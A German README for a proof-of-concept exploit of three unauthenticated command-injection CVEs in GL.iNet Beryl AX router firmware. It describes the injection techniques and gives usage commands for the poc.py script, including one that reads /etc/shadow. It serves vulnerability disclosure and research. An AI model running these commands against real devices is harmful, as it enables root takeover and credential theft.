
PoC für drei nicht authentifizierte Befehlsinjektions-Schwachstellen (CVE-2026-11450/1/2) in der GL.iNet Beryl AX Reiserouter-Firmware <=4.4.5, die den CGI-Dispatcher ohne Authentifizierung ausnutzt.
PoC für drei nicht authentifizierte Command-Injection-Schwachstellen (CVE-2026-11450, CVE-2026-11451, CVE-2026-11452) im GL.iNet GL-MT3000 (Beryl AX) Reiserouter Firmware ≤ 4.4.5.
Vollständiger Bericht: https://www.hunt-benito.com/blog/glinet-beryl-ax-triple-rce-cve-2026-11450-11451-11452-unauthenticated-root-on-travel-router/
| CVE | CVSS | Technik |
|---|---|---|
| CVE-2026-11450 | 7.3 | Puffergrößenkonflikt (0x40 vs 0x100) umgeht access()-Sperre, $() über system() injiziert |
| CVE-2026-11451 | 7.3 | Single-Quote-Escape im FTP-Parameter media_dir durchbricht Shell-Quoting |
| CVE-2026-11452 | 7.3 | $()-Befehlsersetzung im Samba-Passwort-Parameter innerhalb doppelt quotiertem printf |
Alle drei nutzen den nicht authentifizierten /cgi-bin/glc CGI-Dispatcher aus, der Plugins über dlopen/dlsym ohne Authentifizierung oder Methoden-Whitelist lädt.
# Alle drei CVEs ausnutzen
python3 poc.py http://192.168.8.1
# Ein bestimmtes CVE ausnutzen
python3 poc.py http://192.168.8.1 -c "id" -v 11450
python3 poc.py https://192.168.8.1 -c "id" -v 11451
python3 poc.py https://192.168.8.1 -c "id" -v 11452
# Benutzerdefinierter Befehl und Ausgabedatei
python3 poc.py http://192.168.8.1 -c "cat /etc/shadow" -o /tmp/pwned
Nur für Bildungszwecke und autorisierte Sicherheitsforschung. Nicht gegen Systeme verwenden, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.